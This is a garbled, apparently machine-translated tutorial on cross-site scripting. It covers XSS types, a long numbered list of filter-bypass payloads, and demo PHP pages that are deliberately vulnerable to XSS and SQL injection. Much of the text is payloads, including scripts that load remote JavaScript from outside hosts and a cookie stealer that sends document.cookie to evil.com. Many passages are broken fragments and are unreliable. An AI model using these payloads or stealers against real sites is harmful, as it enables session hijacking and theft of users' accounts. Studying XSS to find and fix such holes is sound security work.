Understand XSS from the principles of network security

01. Principles and classifications of XSS

Cross-site scripting attack XSS (Cross Site Scripting), in order not to be confused with the abbreviation of Cascading Style Sheets (CSS)

Therefore, the cross-site scripting attack is abbreviated as XSS. A malicious attacker inserts malicious Script code into the Web page. When the user browses the page, the Script code embedded in the Web will be executed, thereby achieving the purpose of maliciously attacking the user. are user-level attacks;

XSS is divided into: storage type, reflection type, DOM type XSS



stored When the page is executed, the code is executed. This kind of XSS is more dangerous and can easily cause worms and steal cookies;

reflective information;

DOM-type XSS: Without going through the backend, the DOM-XSS vulnerability is a vulnerability based on the Document Object Model (DOM). DOM-XSS is triggered by passing parameters through the url to obtain control. In fact, it is also a reflection type. XSS, detailed explanation of DOM: DOM document object model;

Attributes that may trigger DOM-style XSS


02. Dangers of XSS attacks

1. Steal various user accounts, such as machine login accounts, user online banking accounts, and various administrator accounts; 2. Control corporate data, including the ability to read, tamper with, add, and delete corporate sensitive data; 3. Steal corporate data Important information with commercial value; 4. Illegal transfer; 5. Forced sending of emails; 6. Website malware; 7. Controlling the victim’s machine to launch attacks on other websites;

03, XSS test statements

When checking whether there are XSS vulnerabilities in a website, you should enter some tags, such as <, >. After inputting, check whether the web page source code is filtered for tags. If there is no filtering, there is a high probability that there is an XSS vulnerability.

Commonly used test statements:





It can be seen that the website does not filter tags;


As you can see, there is no pop-up, but 1 is output on the console. We can confirm that XSS does exist;

Closure issue: Many times, when testing XSS, we want to consider the closure issue. We first check the source code of the web page, and we need to first determine whether the website uses single quotes or double quotes;



Single line comment:

">x//#Double slash indicates commenting out the following statement

0x04, XSS attack statement

Input detection determines that the tag is not filtered. In order to show that the vulnerability exists, XSS attack code needs to be inserted;

<script>alert(1)</script></code><code><svg onload=alert(1)></code><code><a href=javascript:alert(1)></code><code><a href='javascript:alert(1)'>aa</a>

Copy code

(1) Ordinary XSS JavaScript injection(2) IMG tag XSS uses JavaScript command(3)IMG tag has no semicolon or quotes< /strong>(4)IMG tags are not case sensitive(5)HTML encoding (must have semicolon)(6)Fix defective IMG tag ">(7)formCharCode tag (calculator)(8)UTF-8 Unicode encoding (calculator)(9) The 7-bit UTF-8 Unicode encoding does not have a semicolon (calculator)(10) Hexadecimal encoding also has no semicolon (calculator) (11) Embedded tags, separate Javascript(12) Embedded coding Tag, separate Javascript(13) Embedded line breaks (14) Embedded carriage return(15) Embedded multi-line injection of JavaScript, this is an extreme example of XSS (16) Solving restricted characters (requires the same page)

<script>z='document.'</script></code><code><script>z=z + 'write("'</script></code><code><script>z =z + '<script'</script></code><code><script>z=z + 'src=ht'</script></code><code><script>z=z + 'tp ://ww'</script></code><code><script>z=z + 'w.shell'</script></code><code><script>z=z + '.net/ 1.'</script></code><code><script>z=z + 'js></sc'</script></code><code><script>z=z + 'ript>" )'</script></code><code><script>eval_r(z)</script>

Copy code

(17) Null character 12-7-1 T00LS - Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action=printable & amp;tid=15267 2/6perl-e 'print "";' > out(18) Null character 2, null character is basically non-existent in China Effect. Because there is no place to useperl -e 'print "alert("XSS")";' > out(19)IMG tag before Spaces and meta(20)Non-alpha-non- digit XSS(21)Non-alpha-non -digit XSS to 2

<BODY onload!#$% & amp;()*~ + -_.,:;?@[/|\]^`=alert("XSS")>

Copy code

(22)Non-alpha-non-digit XSS to 3(23)Double opening brackets<(24) No closing script tag ( Only browsers such as Firefox)(29) Escape filter JavaScript";alert('XSS');//(30)End Title tag(31)Input Image (32)BODY Image(33)BODY Tag(34)IMG Dynsrc(35)IMG Lowsrc (36)BGSOUND(37)STYLE sheet (38)Remote Style Sheet(39)List -style-image(list-style)

  • XSS(40)IMG VBscript
    • XSS(41)META link url(42)Iframe( 43) Frame

      <FRAMESET><FRAME SRC="javascript:alert('XSS');"></code><code></FRAMESET>12-7-1 T00LS - Powered by Discuz!</code><code>Boardhttps://www.a.com/viewthread.php?action=printable & amp;tid=15267 3/6

      Copy code


      (46)DIV background-image
      (47)DIV background-image followed by extra characters(1-32 & amp;34 & amp;39 & amp;160 & amp;8192-8 & amp;13 & amp;12288 & amp;65279) **
      **< strong>(48)DIV expression
      (49)STYLE attribute split expression(50) Anonymous STYLE (composed: open number and starting with a letter) (51)STYLE background-image(52)IMG STYLE way expression(alert("XSS"))'>(53)STYLE background

      <STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code><code>(54)BASE</code><code><BASE HREF="javascript:alert('XSS');//">

      Copy code

      (55)EMBED tag, you can embed FLASH, which contains XSS(56) Use ActionScrpt in flash to mix in your XSS codea="get";b="URL("";c="javascript:";d ="alert('XSS');")";eval_r(a + b + c + d);(57) The XML namespace.HTC file must be on the same server as your XSS vector onimplementation="http://3w.org/XSS/xss.htc">XSS(58) If your JS is filtered, you can add JS code to the image to take advantage of it(59)IMG embedded command, can execute any command(60)IMG embedded command (a.jpg in the same server)Redirect 302 /a.jpg http://www.XXX. com/admin.asp &deleteuser(61) Symbol filtering·(62) (63)< strong>(64)(65 )(66)

      12-7-1 T00LS - Powered by Discuz! Board</code><code>https://www.a.com/viewthread.php?action=printable & amp;tid=15267 4/6<SCRIPT a=">'>"</code><code>SRC="http://3w.org/xss.js"></SCRIPT>

      Copy code


      <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

      Copy code

      (68)URL DetourXSS(69)URL EncodingXSS(70)IP DecimalXSS(72)IP OctalXSS(74) Save[ http:]XSS(75) Save [www]XSS(76) Absolute DNSXSS(77)javascript linkXSS

      Attack statements for each label;

      <script>alert("hack")</script> #Popup hack</code><code><script>alert(/hack/)</script> #Popup hack</code><code>< script>alert(1)</script> #Pop up 1, you don’t need quotation marks for numbers</code><code><script>alert(document.cookie)</script> #Pop up cookie</code><code>< script src=http://xxx.com/xss.js></script> #Reference external xss</code>
      svg tag:
      <svg onload="alert(1)"></code><code><svg onload="alert(1)"//</code>
      <img src=1 οnerrοr=alert("hack")></code><code><img src=1 οnerrοr=alert(document.cookie)> #Pop-up cookie


      <body οnlοad=alert(1)></code><code><body οnpageshοw=alert(1)></code>
      video tag:
      <video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

      style tag:

      <style οnlοad=alert(1)></style>

      05. Mining of XSS vulnerabilities

      5.1, black box testing

      Try to find everything that is user-controllable and can be output in the page code, such as the following:

      • Each parameter of the URL

      • URL itself

      • form

      • search bar

      5.2. Common business scenarios

      • Hardest-hit areas: comment area, message area, personal information, order information, etc.

      • Target type: In-site messages, web page instant messaging, private messages, feedback

      • There are risks: search box, current directory, image attributes, etc.;

      5.3. White box audit

      The code audit for XSS mainly starts from the place where parameters are received and some key points;

      Common methods for receiving parameters in PHP include G?ET, _POST, $_REQUEST, etc. You can search for all methods for receiving parameters, and then track the received data to see if it is output to the page, and then look at the output Whether the data in the page has been filtered and html encoded

      You can also search for output statements like echo to track where the output variables come from, whether we can control it, if it is obtained from the database, whether we can control the data stored in the database, whether it is filtered before being stored in the database, etc. ;

      Most programs will uniformly call functions that receive parameters encapsulated in public files. We need to audit these public functions to see if they are filtered, whether they can be bypassed, etc.;

      In the same way, when auditing DOM injection, you can search for some JS keywords that operate on DOM elements for auditing;

      06. XSS attack process

      6.1. Reflected XSS vulnerability:

      1. Alice often browses a website, which is owned by Bob. Bob’s site requires Alice to log in with a username and password, and stores Alice’s sensitive information (such as bank accounts);

      2. Tom discovered that Bob’s site had a reflected XSS vulnerability;

      3. Tom used the reflected XSS vulnerability of Bob’s website to write an exp in the form of a link, and used various means to induce Alice to click

      4. After Alice logged in to Bob’s site, she browsed the malicious link provided by Tom;

      5. The malicious script embedded in the malicious link is executed in Alice's browser. This script steals sensitive information (cookies, account information, etc.) and then sends this information to Tom without Alice's knowledge;

      6. Tom can use the obtained Cookie to log in to Bob's website as Alice's identity information. If the script is more powerful, Tom can also control Alice's browser and further exploit the vulnerability;

      6.2. Stored XSS vulnerability:

      1. Bob owns a Web site that allows users to publish information and browse published information;

      2. Tom detects that Bob’s site has a stored XSS vulnerability;

      3. Tom publishes hot information with a malicious script on Bob’s website, which is stored in the database of Bob’s server, and then attracts other users to read the hot information;

      4. After Bob or anyone else, such as Alice, browses the information, Tom's malicious script will be executed;

      5. After Tom’s malicious script is executed, Tom can launch an XSS attack on the user of the browser page;

      07, XSS attack test

      7.1. Remote loading attack payload

      XSS vulnerabilities can achieve many functions by constructing malicious XSS statements. One of the most common ones is constructing XSS malicious code to obtain the COOKIE of the other party's browser;

      1) We first save the malicious code in local kali. In actual combat situations, we save the code on our server;

      var img=document.createElement("img");</code><code>img.src="http://www.evil.com/log?" + escape(document.cookie);</code> code><code>document.body.appendChild(img);


      2) We use python to open the http service in kali;

      python -m http.server 80

      3) We remotely load our malicious code where there is an XSS vulnerability:


      Seeing the browser loading, our xss malicious code;

      4) Successfully obtained cookie information


      5) Image creation link

      <img src=''</code><code>onerror=document.body.appendChild(document.createElement('script')).src='//</code><code>js'></code>
      6) Character splicing

      This is generally used when the input characters are limited.

      <script>z='document.'</script></code><code><script>z=z + 'write("'</script></code><code><script>z =z + '<script'</script></code><code><script>z=z + ' src=ht'</script></code><code><script>z=z + 'tp ://www.'</script></code><code><script>z=z + 'xsstools'</script></code><code><script>z=z + '.com/a '</script></code><code><script>z=z + 'mER></sc'</script></code><code><script>z=z + 'ript>")' </script></code><code><script>eval(z)</script></code><code>In some cases, /**/ needs to be used to annotate unnecessary code. </code>
      7) jQuery loading

      7.2. Reflected XSS:

      //Front-end 1.html:</code><code><html></code><code><head lang="en"></code><code> <meta charset="UTF-8 "></code><code> <title>Reflected XSS</title></code><code></head></code><code><body></code><code> <form action ="action.php" method="post"></code><code> <input type="text" name="name" /></code><code> <input type="submit" value=" Submit"></code><code> </form></code><code></body></code><code></html></code>
      <code>//Backend action.php:</code><code><?php</code><code> $name=$_POST["name"]; </code><code> echo $name; </code><code>?></code>
      We then enter in the input box: <code><script>alert(/xss/)</script>


      The page directly pops up the xss page. You can see that the statement we inserted has been executed by the page. This is the most basic reflected XSS vulnerability. This vulnerability flows to: front end --> back end --> front end

      7.3. Stored XSS:

      //Front end: 2.html</code><code><html></code><code><head lang="en"></code><code> <meta charset="UTF-8 "></code><code> <title>Stored XSS</title></code><code></head></code><code><body></code><code> <form action ="action2.php" method="post"></code><code> Enter your ID: <input type="text" name="id" /> <br/></code><code> Enter Your Name: <input type="text" name="name" /> <br/></code><code> <input type="submit" value="Submit"></code><code> < /form></code><code></body></code><code></html></code><code>//Backend: action2.php</code><code><?php </code><code> $id=$_POST["id"];</code><code> $name=$_POST["name"];</code><code> mysql_connect("localhost"," root","root");</code><code> mysql_select_db("test");</code>
      <code> $sql="insert into xss value ($id,'$name')";</code><code> $result=mysql_query($sql);</code><code>?></code><code>//For other users to access the page: show2.php</code><code><?php</code><code> mysql_connect("localhost","root","root");</code><code> mysql_select_db("test");</code><code> $sql="select * from xss where id=1";</code><code> $result=mysql_query($sql);</code> code><code> while($row=mysql_fetch_array($result)){<!-- --></code><code> echo $row['name'];</code><code> }</code><code>?></code>Here is a user submission page. After the data is submitted to the backend, the backend stores it in the database. Then when other users access another page, the backend calls up the data. Displayed to another user, the XSS code is executed;


      We enter 3 and , then, we look at the database;


      As you can see, our XSS statement has been inserted into the database;

      Then when other users visit the show2.php page, the XSS code we inserted is executed;

      The data flow direction of stored XSS is: front end --> back end --> database --> back end --> front end


      7.4, DOM type XSS

      First put the source code:

      // Front-end 3.html</code><code><html></code><code> <head lang="en"></code><code> <meta charset="UTF-8" ></code><code> <title>DOM type XSS</title></code><code> </head></code><code> <body></code><code> <form action= "action3.php" method="post"></code><code> <input type="text" name="name" /></code><code> <input type="submit" value="Submit "></code><code> </form></code><code> </body></code><code> </html></code><code> // Backend action3.php</code><code> <?php</code><code> $name=$_POST["name"];</code><code>?></code><code><input id="text" type="text" value="<?php echo $name; ?>"/></code><code><div id="print"></div></code><code><script type= "text/javascript"></code><code> var text=document.getElementById("text");</code><code> var print=document.getElementById("print");</code><code> print.innerHTML=text.value; // Get the value of text and output it in print. Here are the main causes of xss. </code><code></script></code>
      There is a submission page here where users can submit data. After the data is submitted, it is processed in the background;


      We can enter , and then see the page changes;

      The hack page pops up directly on the page, and the statement we inserted has been executed by the page;

      This is a DOM type XSS vulnerability. The data flow direction of this vulnerability is: front end --> browser

      08, XSS encoding bypass

      8.1, gpc filter characters

      If gpc is turned on, special characters will be appended with slashes, that is, 'becomes'. Do not use single quotes or double quotes in the xss attack code;

      Bypass gpc In higher versions of PHP, gpc is not available by default, but developers will use addcslashes() to escape special characters; This cannot be executed Can be executed without single quotes

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